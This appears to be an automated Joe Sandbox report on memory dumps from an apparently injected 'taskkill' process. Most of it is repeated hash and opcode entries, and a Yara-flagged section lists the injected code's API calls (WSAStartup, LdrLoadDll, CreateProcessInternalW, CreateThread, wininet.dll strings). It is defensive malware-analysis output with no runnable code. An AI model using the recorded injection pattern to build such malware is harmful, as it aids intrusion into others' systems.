                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 8716070dce392685c16c1281e560963e47c849285e39fd61262d186f626a6df2
                                                                                                                                                                                                                                      • Instruction ID: 6532b0997a6a24d3f18501e60b8363f079dd25dbe5510591f4f422370e3c8c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8716070dce392685c16c1281e560963e47c849285e39fd61262d186f626a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D890026260150042654071584C044066005DBE2305395C155A1595561C8718D96A9269
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: d5946daae606e982bbc142a4be14fd533a9365a399086db706c9981011665db5
                                                                                                                                                                                                                                      • Instruction ID: 94716ceec6348edfea0e516ca4304fcef12c421b57907a20bc23d9bed927a5f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5946daae606e982bbc142a4be14fd533a9365a399086db706c9981011665db5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F190023260580012B54071584C845464005DBE1305B55C051E1465555C8B14DA6B5361
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 99597994f4aaa39fddc112a4eb60735f30817b610fc539743316ca4eda053095
                                                                                                                                                                                                                                      • Instruction ID: d33a5a07e47feaf3d6e6c247a3ca93585ce28010b92ae51a8a3bb22fba6cfe79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99597994f4aaa39fddc112a4eb60735f30817b610fc539743316ca4eda053095
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7990023220140402F500759858086460005CBE1305F55D051A6065556EC765D9A66131
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 35aa5fabdd72cbbdeca88952d7044904b5cce4aed087b5b6eea07d66fbfa0b88
                                                                                                                                                                                                                                      • Instruction ID: badf601c450191a523f55df7af997ed080ec96ef198f4796cd107f1301965b5c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35aa5fabdd72cbbdeca88952d7044904b5cce4aed087b5b6eea07d66fbfa0b88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5090023220148802F5107158880474A0005CBD1305F59C451A5465659D8795D9A67121
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: a9a630b9a8b94484cb61c5029f6a04a65b8bfe03bcef6aac527d34aacd4333c2
                                                                                                                                                                                                                                      • Instruction ID: 017f298708a33aedb0a38611d14e90f14acad86febe1757b3e20406b28416f9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9a630b9a8b94484cb61c5029f6a04a65b8bfe03bcef6aac527d34aacd4333c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F90023220140842F50071584804B460005CBE1305F55C056A1165655D8715D9667521
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: d1864ec73cbc18bb2e33f6489553622b2f15edbcb9745ac9bc8d2ff6b5e11169
                                                                                                                                                                                                                                      • Instruction ID: 74471d5b1d97f95eec91f485a1280bb7cdba6cac6d5b25f0d0aa9cfe2446816b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1864ec73cbc18bb2e33f6489553622b2f15edbcb9745ac9bc8d2ff6b5e11169
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D90023220140413F511715849047070009CBD1245F95C452A1465559D9756DA67A121
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 66dc53e065ad05fb5508f1b6b74a1b38bb33767b9fee678e456e8fa124861558
                                                                                                                                                                                                                                      • Instruction ID: 8f2b3852601b03d5f5eb0ef13adabd1f8d913325fb3d9a370ee0c4ef787662c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dc53e065ad05fb5508f1b6b74a1b38bb33767b9fee678e456e8fa124861558
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0900222242441527945B15848045074006DBE1245795C052A2455951C8726E96BD621
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: ad4a5a72f0089b44d47578bccb98b15c657bbc8ea7d3c1402bf503784469646f
                                                                                                                                                                                                                                      • Instruction ID: a0d1409ca0c78c26e638384e4be8cd251127d70327efade93553d22d3e204312
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad4a5a72f0089b44d47578bccb98b15c657bbc8ea7d3c1402bf503784469646f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C990022230140003F540715858186064005DBE2305F55D051E1455555CDB15D96B5222
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 6c2aa838263ce1e14539daa788904f242c4de2107b29ebd8560d437fb27b8c33
                                                                                                                                                                                                                                      • Instruction ID: 50ca226d2b48148b8f6805642298a355455e6f35831236e7ed797b5a49814752
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c2aa838263ce1e14539daa788904f242c4de2107b29ebd8560d437fb27b8c33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A90022A21340002F5807158580860A0005CBD2206F95D455A1056559CCB15D97E5321
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 6db378db695f73f4c0d9540ffb82c33c9e1791145264932ac39e1da9e6c125da
                                                                                                                                                                                                                                      • Instruction ID: cb49876837eef875a47ddf3aa3ea5e93931a320a59b16c7996ea9dc11f9b4eff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6db378db695f73f4c0d9540ffb82c33c9e1791145264932ac39e1da9e6c125da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A290026220180403F54075584C046070005CBD1306F55C051A30A5556E8B29DD666135
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 27f3bd50d5d48279800c508a565659eded271ab1830f2f7b89dc6e5e6c2ce9d3
                                                                                                                                                                                                                                      • Instruction ID: 096a3d0fd98b12fc8d9355637a1b2aa6559dd780b4f21bb927c3696bfbc86317
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f3bd50d5d48279800c508a565659eded271ab1830f2f7b89dc6e5e6c2ce9d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B890022260140042654071688C449064005EFE2215755C161A19D9551D8759D97A5665
                                                                                                                                                                                                                                      APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc1ce1c87a9e74d03403c9f653ca9c3c4c82fbf08c61c5f85021570f5c9725c4
• Instruction ID: b3e301a5e9a2e669c7ebe2969ecebb5125fa67a13f06956389e936228e467c5d
• Opcode Fuzzy Hash: bc1ce1c87a9e74d03403c9f653ca9c3c4c82fbf08c61c5f85021570f5c9725c4
• Instruction Fuzzy Hash: 62900222211C0042F60075684C14B070005CBD1307F55C155A1195555CCB15D9765521
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c37db3e554914c16521678d8180e1600740356219e687aa5199cee76bf2b1781
• Instruction ID: ac91ce1fcef7c4c46085a1d0f6ca90830b35d7eeb2676d2709c8900f0139ea04
• Opcode Fuzzy Hash: c37db3e554914c16521678d8180e1600740356219e687aa5199cee76bf2b1781
• Instruction Fuzzy Hash: F290026234140442F50071584814B060005CBE2305F55C055E20A5555D8719DD676126
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cc653820151411b46c8b69e24b1007703bc9775116d5064b864d4cbc71a877be
• Instruction ID: ae5552f2a026f5c3a0804df33fc2d87b390524b3d0ec92532eea04153bfa9bba
• Opcode Fuzzy Hash: cc653820151411b46c8b69e24b1007703bc9775116d5064b864d4cbc71a877be
• Instruction Fuzzy Hash: C5900226221400022545B5580A0450B0445DBD7355395C055F2457591CC721D97A5321
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 625fbbe7db1b63bada74a27b0c66ba562831706bc352870ad72f70cd6bb161ee
• Instruction ID: c44315f86db36b314fb73421933a1d5e40684dd3b43aaacad43169c17800fad5
• Opcode Fuzzy Hash: 625fbbe7db1b63bada74a27b0c66ba562831706bc352870ad72f70cd6bb161ee
• Instruction Fuzzy Hash: 7F900226211400032505B5580B045070046CBD6355355C061F2056551CD721D9765121
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6b505747d2f05731b01ed537ec61f6305acd407872af8c37ef034737ed2030e7
• Instruction ID: 08bd7e8d5bc25c41004ebd46ed28e6d032dd8eab80c35d6c47f3e60902b1ff85
• Opcode Fuzzy Hash: 6b505747d2f05731b01ed537ec61f6305acd407872af8c37ef034737ed2030e7
• Instruction Fuzzy Hash: 5790026220240003650571584814616400ACBE1205B55C061E2055591DC725D9A66125
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 212651bdb641de7866166e7a449572a5971c8ac4475ef9ca01fc1b0fe79fb08a
• Instruction ID: a5575e9e8e29da925bdd2d83101f542caae1bcc91ab4891641a4526375da63b3
• Opcode Fuzzy Hash: 212651bdb641de7866166e7a449572a5971c8ac4475ef9ca01fc1b0fe79fb08a
• Instruction Fuzzy Hash: ED90023260550402F500715849147061005CBD1205F65C451A1465569D8795DA6665A2
APIs
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ad405a7cbc1b0ab9a7f6700f4c727e55feeb8126100d08c09b43a0cc410a5e69
• Instruction ID: 523df90e5a0083344b5408466bec9b0af2aa3fde7f7147cac39af9f490c3000a
• Opcode Fuzzy Hash: ad405a7cbc1b0ab9a7f6700f4c727e55feeb8126100d08c09b43a0cc410a5e69
• Instruction Fuzzy Hash: DF90022224545102F550715C48046164005EBE1205F55C061A1855595D8755D96A6221

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 265 873750-873772 266 873777-873784 265->266 266->266 267 873786-87378e 266->267 268 873790-87379c 267->268 269 8737ea-8737f2 267->269 270 8737a5-8737c3 269->270 271 8737f4-873819 269->271 272 8737c5-8737dd 270->272 273 87374c-87374d 270->273 274 873820-873821 271->274 275 8737e4-8737e5 272->275 276 8737df-8737e0 272->276 273->265 277 873823-873838 274->277 278 8737e2-8737e3 274->278 276->278 279 873839-873842 277->279 278->275 278->279 281 873844-873847 279->281 282 8738ad-8738ae 279->282 281->274 285 873849-873854 281->285 283 8738b0-8738b5 282->283 284 87391a 282->284 286 873985-8739b8 call 871a40 284->286 287 87391c-873923 284->287 288 873856-87385b 285->288 289 8737e8 285->289 303 8739c0-8739d4 Sleep 286->303 290 873925-873938 call 87b270 287->290 291 873953-873982 call 864350 call 851410 287->291 292 87385d-87385e 288->292 293 873899-87389f 288->293 289->269 304 873a44-873a4a 290->304 305 87393e-87394f call 87b350 290->305 291->286 300 873866-873874 292->300 295 8738a1-8738a4 293->295 295->300 301 8738a6 295->301 309 873876-87388b 300->309 310 8738b9-8738bf 300->310 301->282 307 8739d6-8739e8 303->307 308 873a35-873a3c 303->308 305->291 311 873a0a-873a23 call 875e40 307->311 312 8739ea-873a08 call 875da0 307->312 308->303 314 873a3e 308->314 315 8738c1-8738c3 310->315 316 873890-873895 310->316 323 873a28-873a2b 311->323 312->323 314->304 320 8738c5-8738c8 315->320 321 8738e4-87390a 315->321 316->293 320->295 324 8738ca-8738cf 320->324 325 87390f-873917 321->325 323->308 324->325 326 8738d1 324->326 325->284 327 8738b6-8738b8 326->327 328 8738d3-8738e0 326->328 327->310
Memory Dump Source
• Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
Yara matches
Similarity
• API ID:
• String ID: dll$net.$net.dll$wini$wininet.dll
• API String ID: 0-721535879

Control-flow Graph (function at 8738f0; graph rendering omitted)
APIs
• Sleep.KERNELBASE(000007D0), ref: 008739CB
Similarity
• API ID: Sleep
• String ID: dll$net.$net.dll$wini$wininet.dll
• API String ID: 3472027048-721535879

Control-flow Graph (function at 8617c0; graph rendering omitted)
APIs
• WSAStartup.WS2_32(00000202,?), ref: 00861ACD
Similarity
• API ID: Startup
• String ID: 5$5
• API String ID: 724789610-2059066348
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008643C2
Similarity
• API ID: Load
• String ID: 6v
• API String ID: 2234796835-3628208636
APIs
• WSAStartup.WS2_32(00000202,?), ref: 00861ACD
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 008643C2
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
                                                                                                                                                                                                                                      • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction ID: 50576b89144613c51fdb7ffcaa850c170c992aa7d018d88ac3238fa283c04ab0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD011EB5D0020DABDB10EAA4DD42F9EB7B8EB54308F0081A9ED1CD7245F631EB548B92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,0086811E,00000010,?,?,?,00000044,?,00000010,0086811E,?,?,?), ref: 00879683
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                                                                                                      • Opcode ID: 5450a031f6df984c4033fe787349d76cbc6ac8c323c19fe2a5bd84b109ec046b
                                                                                                                                                                                                                                      • Instruction ID: 2f326ec4fa8f2a9bdef9312de7a955185a7c6d82b57573e801e53ab3357882a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5450a031f6df984c4033fe787349d76cbc6ac8c323c19fe2a5bd84b109ec046b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001C4B2201109BBCB14DE89DC85EEB77ADEF8C754F408108BA09D3241D630F8518BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00859BD5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: 0ca80b039a6a57d2add5d83463eabd07052eb8ec9c9908620c71049f0e87aeb8
                                                                                                                                                                                                                                      • Instruction ID: 47fcc5988082ab06ee42ec00697f3d0bd90fcc12a0222934dc3ea60ada1f80b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ca80b039a6a57d2add5d83463eabd07052eb8ec9c9908620c71049f0e87aeb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F06D7338421436E72065ADAC03FD7B78CEB80BA1F144029FB0CEB1C1D995F80242AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00498D03,00000007,00000000,00000004,00000000,00863BD8,000000F4), ref: 008795CF
                                                                                                                                                                                                                                      Memory Dump Source
